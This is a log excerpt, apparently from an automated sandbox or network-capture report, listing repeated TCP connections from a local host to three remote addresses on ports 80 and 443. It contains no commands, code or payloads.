Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.185.228:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49190 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49191 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
